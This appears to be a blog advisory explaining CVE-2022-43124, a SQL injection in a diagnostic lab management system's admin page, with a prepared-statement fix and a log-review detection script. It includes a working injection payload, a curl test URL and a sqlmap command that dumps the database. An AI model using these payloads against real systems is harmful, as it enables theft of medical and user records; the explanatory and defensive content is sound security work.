Online Diagnostic Lab Management System v1. might sound like a secure way to handle medical records and diagnostics, but in late 2022, it was found vulnerable to a rather basic SQL Injection bug. CVE-2022-43124 allows an attacker to bypass security by targeting the id parameter in a specific admin page. In this article, we'll break down how this vulnerability works, show a sample exploit, and reference the original sources.
What Is SQL Injection Anyway?
SQL Injection (SQLi) is a web security vulnerability that allows attackers to interfere with the queries an application makes to its database. By manipulating the input, adversaries can bypass authentication, view sensitive data, or even modify or delete records, all without valid access.
In Online Diagnostic Lab Management System v1., an administrative web interface lives at:
/admin/?page=user/manage_user&id=<user-input>
The id parameter isn't properly sanitized or checked. This lets attackers input SQL code instead of a harmless user ID.
The Exploit Details
How does it work?
Suppose the backend code looks something like this (example in PHP):
<?php
// Vulnerable code (simplified)
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id'";
$result = mysqli_query($conn, $query);
?>
If an attacker sets id=1' OR 1=1 --, the query becomes:
SELECT * FROM users WHERE id = '1' OR 1=1 -- '
The OR 1=1 always evaluates true. The -- marks the rest as a comment, ignoring what's after. This could leak other users' data or give wider access.
A browser or command-line tool like curl is enough to test the vulnerability:
curl "http://targetsite/admin/?page=user/manage_user&id=1'%20OR%201=1--"
Or, visit in your browser:
http://targetsite/admin/?page=user/manage_user&id=1' OR 1=1--
You may see the table displaying more users than just the one with ID = 1… or even all users.
Tools like sqlmap automate this with a command like:
sqlmap -u "http://targetsite/admin/?page=user/manage_user&id=1" --cookie="admin_sessid=..." --risk=3 --level=5 --dump
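Example (safe PHP with prepared statements):
// Fixed code: the id is bound as an integer parameter ('i'), so it is never parsed as SQL
$stmt = $conn->prepare('SELECT * FROM users WHERE id = ?');
$stmt->bind_param('i', $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();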
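To check whether a deployment has already received requests of the kind shown above, the following added example (not code from the original article or from the application) reviews web server access logs for requests to page=user/manage_user whose id is not a plain integer. The log lines are constructed samples in combined log format, and the function name suspicious_requests is hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Nov/2022:14:20:01 +0000] "GET /admin/?page=user/manage_user&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Nov/2022:14:21:40 +0000] "GET /admin/?page=user/manage_user&id=1'%20OR%201=1-- HTTP/1.1" 200 9876 "-" "curl/7.85.0"
203.0.113.9 - - [01/Nov/2022:14:21:55 +0000] "GET /admin/?page=user/manage_user&id=1%27+OR+1%3D1--+ HTTP/1.1" 200 9876 "-" "curl/7.85.0"
198.51.100.7 - - [01/Nov/2022:14:25:10 +0000] "GET /admin/?page=user/list HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Nov/2022:14:26:02 +0000] "GET /admin/?page=user/manage_user HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Client, timestamp, request target and status from one combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')
PLAIN_INT = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client, time, decoded id, status) for each manage_user request
    whose id parameter is anything other than a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        client, when, target, status = m.groups()
        # parse_qs percent-decodes values and turns '+' into a space,
        # so %27 and a literal ' are treated the same way.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "user/manage_user" not in params.get("page", []):
            continue
        for value in params.get("id", []):  # check every copy if id is repeated
            if not PLAIN_INT.fullmatch(value):
                findings.append((client, when, value, int(status)))
    return findings


if __name__ == "__main__":
    for client, when, value, status in suspicious_requests(SAMPLE_LOG):
        print(f"{when} {client} status={status} id={value!r}")
```

The status and timestamp are carried through so that each hit can be correlated with application or database logs.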
References
- Exploit Database: CVE-2022-43124
- NVD - CVE-2022-43124 entry
- OWASP - SQL Injection
Final Word
Sometimes, old vulnerabilities still reappear in new software. CVE-2022-43124 is a classic reminder: never trust user input, especially in critical apps like diagnostic lab systems. If you run this application, patch immediately or mitigate exposures.
Timeline
Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 23:33:00 UTC